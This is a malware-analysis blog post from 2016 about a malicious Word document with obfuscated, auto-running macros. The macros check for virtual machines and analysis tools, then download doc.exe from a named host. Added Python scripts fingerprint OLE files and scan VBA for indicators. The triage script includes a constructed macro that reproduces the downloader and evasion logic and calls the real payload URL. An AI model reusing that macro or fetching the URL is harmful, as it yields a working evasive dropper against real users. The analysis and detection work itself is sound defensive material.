Subpoena Adam Sisitsky_4291016.doc


Date: 04/29/2016

Filename:
Subpoena Adam Sisitsky.doc

SHA-256 Hash Value:
f7d3f54785ffe118504400f1c33e03608f31760fbdee040d1367ed0d73fe302f


Overview

Today I was tasked with looking at a suspicious Word document, so I started up my analysis system and got to work.

First, I start by fingerprinting the document.

File Type:

Meta Info:


Document Overview:


  
Under the Hood:
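The fingerprinting step above (file type, hash, basic structure) can be scripted. The following is an added example, not a tool from the original post: it identifies the container by magic bytes, parses the fixed fields of an OLE2 (MS-CFB) header to check that the file is a sane compound document, and compares the SHA-256 against the value reported at the top of this post. Because the sample itself is not available here, the input is a constructed minimal OLE2 header built by `build_ole_header`, so the hash comparison is expected to fail for it; on the real file you would pass `open(path, "rb").read()` instead.

```python
import hashlib
import struct

# SHA-256 of the sample as reported at the top of this post.
REPORTED_SHA256 = "f7d3f54785ffe118504400f1c33e03608f31760fbdee040d1367ed0d73fe302f"

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"

# Magic-byte signatures for the containers macro malware commonly ships in.
MAGICS = [
    (OLE_MAGIC, "OLE2 compound file (.doc/.xls; macros live in the OLE stream tree)"),
    (b"PK\x03\x04", "ZIP container (OOXML .docx/.docm; macros in word/vbaProject.bin)"),
    (b"{\\rtf", "RTF (no native macros; look for embedded OLE objects)"),
    (b"%PDF", "PDF"),
]


def identify(data):
    """Return a description of the container based on its leading bytes."""
    for magic, desc in MAGICS:
        if data.startswith(magic):
            return desc
    return "unknown"


def parse_ole_header(data):
    """Parse the fixed fields of an OLE2 (MS-CFB) header; None if not OLE2."""
    if len(data) < 512 or not data.startswith(OLE_MAGIC):
        return None
    # Offsets 24..33: minor version, major version, byte order, sector shift, mini sector shift.
    minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<HHHHH", data, 24)
    # Offsets 44..51: number of FAT sectors, first directory sector.
    num_fat, first_dir = struct.unpack_from("<II", data, 44)
    # Version 3 files use 512-byte sectors, version 4 files 4096-byte sectors.
    sane = (byte_order == 0xFFFE
            and (major, sector_shift) in ((3, 9), (4, 12))
            and mini_shift == 6)
    return {
        "major_version": major,
        "sector_size": 1 << sector_shift,
        "fat_sectors": num_fat,
        "first_dir_sector": first_dir,
        "header_sane": sane,
    }


def fingerprint(data, expected_sha256=None):
    """Size, type, SHA-256 and (for OLE2) header details of a document blob."""
    digest = hashlib.sha256(data).hexdigest()
    info = {
        "size": len(data),
        "type": identify(data),
        "sha256": digest,
        "ole": parse_ole_header(data),
    }
    if expected_sha256 is not None:
        info["hash_matches"] = digest == expected_sha256.lower()
    return info


def build_ole_header(major=3, sector_shift=9):
    """Constructed minimal OLE2 header (no streams), used here as stand-in input."""
    hdr = OLE_MAGIC + bytes(16)                                   # signature + zero CLSID
    hdr += struct.pack("<HHHHH", 0x3E, major, 0xFFFE, sector_shift, 6)
    hdr += bytes(6)                                               # reserved
    hdr += struct.pack("<III", 0, 1, 1)                           # dir sectors, FAT sectors, first dir sector
    return hdr.ljust(512, b"\x00")


if __name__ == "__main__":
    print(fingerprint(build_ole_header(), REPORTED_SHA256))
```

For the metadata shown in the "Meta Info" screenshot, the oletools suite (`olemeta`, `oleid`, `olevba`) reads the OLE property streams and VBA project directly; the header parse above is only the sanity check you would run before handing the file to those tools.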



After profiling the document, I started to inspect the embedded macros.


And of course the code was heavily obfuscated.

This is where things got interesting. 

Since most of these malicious documents are built with a kit, I copied a public function name into Google to see if there were any hits.

https://www.google.com/?gws_rd=ssl#q=yj5zhKqBmrCl9PP%28%29&filter=0

I got hit after hit after hit. "Holy crap," I said to myself.

This document also uses the Document_Open event handler, which makes the macro run automatically when the document is opened.

Script Inspection:

It queries hardware information on the infected system to determine whether it is running inside a virtual machine, i.e. whether it is being analyzed.

It also enumerates running processes to look for analysis tools loaded in memory, such as Wireshark, Snort, and Process Explorer.
 
Once the script has verified that the infected system is not an analysis system, it makes an HTTP GET request to chienenforme.com/img/doc.exe.
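The behaviours listed in this section, together with the obfuscated function names noted earlier, are exactly what a quick static triage pass should pull out of the VBA source before any dynamic work. The script below is an added example and not code from the original post: it runs a set of regexes over VBA text to flag auto-execute handlers, WMI hardware and process queries, VM and analysis-tool strings, download primitives and URLs, and it lists every `Sub`/`Function` name so that oddly shaped ones can be searched online the way the post does with yj5zhKqBmrCl9PP. The indicator lists, weights and the obfuscation heuristic are my own choices. `SAMPLE_VBA` is a constructed stand-in that imitates the described behaviour (it reuses the function name and the payload URL from the post) and is not the real macro; `BENIGN_VBA` is a constructed clean macro for contrast.

```python
import re

# Constructed stand-in for the document's macro: Document_Open trigger, WMI hardware
# query, scan of running processes for analysis tools, HTTP GET for doc.exe, and an
# obfuscated procedure name. Not the real macro code.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    yj5zhKqBmrCl9PP
End Sub

Public Function yj5zhKqBmrCl9PP()
    Dim wmi As Object, item As Object, http As Object
    Set wmi = GetObject("winmgmts:\\.\root\cimv2")
    For Each item In wmi.ExecQuery("Select * From Win32_ComputerSystem")
        If InStr(item.Model, "VirtualBox") > 0 Then Exit Function
    Next
    For Each item In wmi.ExecQuery("Select * From Win32_Process")
        Select Case LCase(item.Name)
            Case "wireshark.exe", "snort.exe", "procexp.exe"
                Exit Function
        End Select
    Next
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://chienenforme.com/img/doc.exe", False
    http.Send
End Function
'''

# Constructed benign macro for contrast.
BENIGN_VBA = r'''
Sub FormatTable()
    Selection.Tables(1).Style = "Table Grid"
End Sub
'''

# Indicator categories (all groups non-capturing so findall returns whole matches).
INDICATORS = {
    "autoexec": r"\b(?:Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b",
    "wmi_hardware": r"\bWin32_(?:ComputerSystem|Processor|BIOS|DiskDrive|VideoController|BaseBoard)\b",
    "vm_strings": r"\b(?:virtualbox|vbox|vmware|qemu|xen|hyper-v|virtual machine)\b",
    "process_enum": r"\bWin32_Process\b",
    "analysis_tools": r"\b(?:wireshark|snort|procexp|procmon|ollydbg|x64dbg|idaq|fiddler|tcpview|vboxservice|vmtoolsd)(?:\.exe)?\b",
    "downloader": r"\b(?:MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile|ADODB\.Stream|InternetOpen)\b",
    "execution": r"\b(?:WScript\.Shell|Shell\s*\(|ShellExecute|CreateProcess)",
}
# Weights are an assumption chosen for this example, not a published scoring scheme.
WEIGHTS = {"autoexec": 2, "wmi_hardware": 2, "vm_strings": 2, "process_enum": 1,
           "analysis_tools": 3, "downloader": 3, "execution": 3}
URL_RE = r"https?://[^\s\"'<>]+"
# Space/tab only (not \s) so "End Sub\n\nPublic ..." does not yield "Public".
PROC_RE = r"\b(?:Sub|Function)[ \t]+([A-Za-z_]\w*)"


def looks_obfuscated(name):
    """Heuristic: long procedure names mixing digits, upper and lower case."""
    return (len(name) >= 10
            and any(c.isdigit() for c in name)
            and any(c.islower() for c in name)
            and any(c.isupper() for c in name))


def triage(vba):
    """Scan VBA source text and return indicators, URLs, procedure names and a score."""
    hits = {}
    for cat, pat in INDICATORS.items():
        found = sorted(set(re.findall(pat, vba, re.IGNORECASE)))
        if found:
            hits[cat] = found
    urls = list(dict.fromkeys(re.findall(URL_RE, vba)))
    procedures = re.findall(PROC_RE, vba)
    obfuscated = [p for p in procedures if looks_obfuscated(p)]
    score = sum(WEIGHTS[c] for c in hits) + 2 * bool(obfuscated) + len(urls)
    return {
        "hits": hits,
        "urls": urls,
        "procedures": procedures,
        "obfuscated_names": obfuscated,
        "score": score,
        "verdict": "suspicious" if score >= 5 else "benign-looking",
    }


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(label, triage(src))
```

On a real document, feed the output of `olevba` (which extracts the VBA modules from the OLE stream tree) into `triage`; the `procedures` list is what you would paste into a search engine, and `urls` goes straight into the IOC list.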

Dynamic Analysis:

In my opinion it's much easier to analyze macro code dynamically than statically, due to a growing problem with tools not being able to handle evolving data-obfuscation techniques.

Dynamic part 1

I have been playing with this script, which hooks into the process and outputs the execution flow.

Spooky-Hook.py 

Hook 1.


Hook 2.

Hook 3.

 

  Result.

 

Domain Inspection:

Interesting, these servers have been around for some time:

 

 

Another reference to this can also be found here:

http://www.broadanalysis.com/2016/04/29/malicious-word-doc-sends-nymaim-info-stealer-and-more/

 

 

 


